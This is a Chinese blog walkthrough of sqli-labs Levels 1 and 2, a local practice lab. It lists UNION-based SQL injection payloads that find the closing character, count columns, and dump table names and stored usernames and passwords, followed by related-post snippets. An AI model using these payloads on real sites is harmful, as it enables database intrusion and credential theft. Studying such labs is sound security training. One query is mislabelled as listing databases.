SQL注入·sqli-labs·基于错误的字符串/数字型注入(第1~2关)

最新推荐文章于 2023-05-15 15:09:00 发布
最新推荐文章于 2023-05-15 15:09:00 发布
阅读量527 收藏 1
点赞数 2
分类专栏: SQL注入 文章标签: 数据库 mysql sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/king_ho/article/details/107559672
版权

Less-1

先以get方式输入?id=1 or 1=1 --,结果如下,未报错并且绿字反馈用户名及密码:

http://127.0.0.1/sqli-labs/Less-1/?id=1 or 1=1 --

在这里插入图片描述
测试闭合符号,常见的闭合符号有'"')"),这一题用到的闭合符号恰巧都能使用

判断列数oeder by (by 3测试字段数为3)

http://127.0.0.1/sqli-labs/Less-1/?id=1' order by 3 --+

在这里插入图片描述直到值为4的时候反馈库中没有第四列数据:
在这里插入图片描述
union联合查询
测试联合查询库中有的前三列,格式如下,做间隔符:

http://127.0.0.1/sqli-labs/Less-1/?id=1' and 1=2 union select 1,2,3 --+

没有报错证明命令格式无误,但依旧反馈两个大大的绿色 Dumb ,依旧不是我们想要的,问题在于union前面的id,ID值为1的1、2、3列表内没有数据不代表别的ID值内没有,尝试更换ID值继续测试:

http://127.0.0.1/sqli-labs/Less-1/?id= X ’ and 1=2 union select 1,2,3 --+

将以上命令中的红色X(ID值)替换得到的不同反馈如下:
ID=0时(无信息)↓---------------------------ID=2时(有趣)↓在这里插入图片描述
ID=X
前面的步骤自从判断闭合符之后就是一下这个样子

Your Login name:Dumb
Your Password:Dumb

差点让我放弃,我以为我的靶场坏了呢,突然反馈这么多有趣的信息,立刻精神倍儿棒。继续!

?id=0' union select 1,version(),database() --+

在这里插入图片描述
此处宽字节注入涉及到的函数:
addslashes() 函数返回在预定义字符之前添加反斜杠的字符串;
database()查询数据库;
mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符;
mysql_escape_string() — 转义一个字符串;
version()Version确认(版本确认);

查看所有数据库名:

?id=1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security')--+

在这里插入图片描述
查询security内的所有表名:

?id=1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security')--+

在这里插入图片描述

爆数据表——使用下面的语句爆破出列名:

?id=1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='users') --+

在这里插入图片描述
爆用户名和密码——使用下面的语句爆破出用户名及密码:

?id=1' union select 1,(select group_concat(password) from security.users) ,(select group_concat(username) from security.users) --+

在这里插入图片描述

Less-2

第一步先判断闭合符,键入?id=1并逐个判断闭合符号
报错:

You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right
syntax to use near ‘’ LIMIT 0,1’ at line 1

不仅是'爆出这样的错误,常见的闭合符'"')")都报出同样的错误。
通过键入

?id=1 and 1=1 --+

反馈亲切的:
Your Login name:Dumb
Your Password:Dumb

推断出闭合符为整形
在这里插入图片描述同第一题判断数列order by,同第一题一样列数为三列:

在这里插入图片描述查看回显地点

?id=-1 union select 1,2,3+

利用联合查询来查找想要的数据:

?id=-1 union select 1,database(),version()--+

在这里插入图片描述
查看后台数据库的语句,可见与预期相符:
在这里插入图片描述
爆用户名和密码,与第一题几乎一样,区别在于闭合符号,第二题考察到的是整形闭合符号,第一题的是'

?id=-1 AND 1=2 union select 1,(select group_concat(password) from security.users) ,(select group_concat(username) from security.users) --+

在这里插入图片描述

未完待续
bosoun_ho
关注
专栏目录
sqli-labs第一
qq_51366383的博客
12-06 488
一、sqli-labs第一 1、判断是字符型还是数字型 Id=2-1 与 id=2 结果相同就是字符型 2、判断闭合符 通过输入’和" 可以判断这的闭合符为’ 3、查询字段数量 字段数为3 4、确认占位信息 5、查看信息 数据库 表名 列名 数据 二、自己上课的笔记 一、有回显之联合注入 union select 加-1是前面是错的,才 页面回显位回显数据 条件:有回显,知道前表字段数 1、获取数据库名 select distinct table_schema from in
我的白帽之路-SQL注入数字型注入sqli-labs Less-2】
Offsett的博客
02-27 402
我的白帽之路
SQLi-Labs SQL注入练习平台(第一)
banyang6297的博客
01-18 369
所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。-----百度百科   我用的是看...
sqli-labs--第一
wyzhxhn的博客
11-05 518
sqli-labs靶场第一
sqli_labs第一
weixin_30924087的博客
03-25 213
安装 从https://github.com/Audi-1/sqli-labs下载源代码 搭建环境用的是phpstudy 编辑sqli\sql-connections\db-creds.inc文件 修改mysql链接数据库帐号密码。 为了方便看见sql语句,在$sql这句话下面添加echo...这句。 $sql="SELECT * FROM users WHERE id='...
sqli-labs 第一
weixin_48800344的博客
08-31 805
sql注入大体解释 通过构造闭合语句来执行想要执行的命令 第一 推荐工具 HackBar 为什么不用url输入,做着做着就不知道代码那里出错了,用hackber方便简洁,其实url输入也行 第一步:判断什么型的注入 1.判断是什么型注入就要看给他错误语句是否报错 例如:判断什么型注入直接看1’ and 1=2# 1 and 1=2#那个会报错 详细因为当运行可执行指令中假如程序有错误语句会报错,如果可执行程序中有错误语句但没报错就可以看出来了 我是这么理解的,希望有更好的解释 [外链图片转存失败
SQL注入 sqli-labs部分解析
ziwenya的博客
08-31 663
sql注入基础操作及相sqli-labs卡通流程
sqli-labs第一sql注入流程
qq_33598708的博客
03-28 1714
正常访问 http://127.0.0.1/sqli-labs-master/Less-1/?id=1 判断注入类型 http://127.0.0.1/sqli-labs-master/Less-1/?id=1' and '1'='1 正常 http://127.0.0.1/sqli-labs-master/Less-1/?id=1' and '1'='2 错误 由' and '1'='1可知道是字符型,如果是数字型的这种会提示错误。 开始注入: http://127.0.0.
sqli-labs注入——sqli-labs的1-65指南
qq_51366383的博客
01-27 1770
sqli-labs图片上一共有75,但是下载的资料都只有65,所以只写了65,本文仅是个人想法,如有不对请多谅解。 前面三部分的数据为:security 1、Emails Id ,email_id 2、referers 3、Uagents id,uagent,ip_address,username 4、Users id,username,password password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,
SQL注入之字符型、数字型注入原理及注入步骤(sqli-labs-master 1-2)
qiqi_w的博客
11-27 6427
SQL注入之字符型、数字型注入原理及注入步骤 sqli-labs-master 1-2演示截图
sqli-labs第1
weixin_45626840的博客
04-23 247
草草写的一篇记录文章 概念 SQL注入就是将恶意代码拼接到业务正常的数据库查询,造成数据库信息泄露等危害。 我觉得 要弄懂SQL注入,需要一点计网的知识,最好知道Web开发的整个流程,中间用了哪些技术,为什么需要这种技术。当然,你首先得懂得数据库以及SQL查询,并且程序设计语言和SQL语言之间的结合(推荐一本书《数据库系统概论》)。有了这些基础,SQL注入就自然而然会懂的。 通思路 输入id,登录正常 尝试闭合语句 单引号报错,推测后端查询语句为: select * from table where
sqli-labs第一(MySql基础)
Carrot_kexin的博客
10-09 194
url中#号无效,在url中使用%23代替#,或使用两个减号--代替注释,注意两个减号后常根一个加号+,被解析为空格,以注释掉后面的引号完成闭合 字符串中所有字符都可以使用16进制输入(需要加0x) 探测有多少列:localhost/sqli-labs-master/Less-1/?id=1' order by 2--+,通过order by来探测列数 利用group_concat来在一行内显示多个信息 探测union注入:localhost/sqli-labs-master/Less-..
sqli-labs系列——第一
1匹黑马
04-26 3986
文章目录判断注入类型开始注入 判断注入类型 首先判断是什么类型的注入,这里是字符型的: 1' and '1'='1 //正常 1' and '1'='2 //错误 开始注入 末尾的注释符#被过滤,所以报错了: URL编码绕过,列长度为3: 爆注入点: 'union SELECT 1,2,3%23 爆表名: http://192.168.1.113:86/Less-1/?id='uni...
sqlilabs通——第一
liuzhen9828的博客
09-22 314
从上边的页面提示中可以看出,ID是其参数 1.判断漏洞 首先根据题目就可以知道这是一个单引号字符型注入漏洞 其次我们可以进行手工判断,输入id=1 and 1=2发现页面显示正常,说明肯定不是数字型,输入id=1'发现页面错误,但是有一个提示limit 0,1'说明后边的单引号没有闭合造成了错误,这就可以说明这是一个单引号引起的漏洞。输入id=1'--+页面正常。 2.漏洞利用 漏洞利用的思路和常规的MySQL一样,为了练习,这里使用手工注入。 判断字段数 id=1' order by 3--+页面.
sqli-labs靶场第一
A_450的博客
12-12 1122
sqli-labs靶场第一
SQLI-LABS 01.第一 【显错注入_单引号闭合】
最新发布
weixin_45284414的博客
05-15 550
首先主动输入一个单引号提前闭合,最后-- x注释掉后边内容。中间可以构造使用AND OR 拼接语句进行探测。01.第一 【显错注入_单引号闭合】)利用常规的显错注入去做题。
sqli-labs第一的闯
qq_45154529的博客
01-05 2162
第一:单引号错误 SQL注入最终是为了拿到数据库的文件或者数据。 刚进页面,显示需要输入id。 于是我们使用在地址栏后面加上 ?id=1 第二行的黄色字体是我自己添加的内容,表示被传入mysql执行的语句(方便我加深理解),绿色字体是正常显示的内容。 如果你也想要显示此语句,可以在安装目录下的此页面的php当中,加入这条语句 echo “$sql” 判断有无注入点: 老规矩:加上and 1=1;and 1=2,看一下回显有没有不同。没有!说明其在sql中不是单纯应用数值作为参数。
渗透漏洞基础之sqli-labs第一
lbg685的博客
02-20 1212
渗透漏洞超级基础之sqli-labs第一
PHP与Apache环境下部署SQL注入靶场sqli-labs指南
部署sqli-labs是一个实战训练过程,它不仅提供了丰富的SQL注入实例,还能帮助开发者熟悉如何防范此类攻击,是提升网络安全技能的实用工具。通过这个靶场,你将更深入理解Web应用程序安全的重要性,并掌握如何在实际...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

bosoun_ho

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值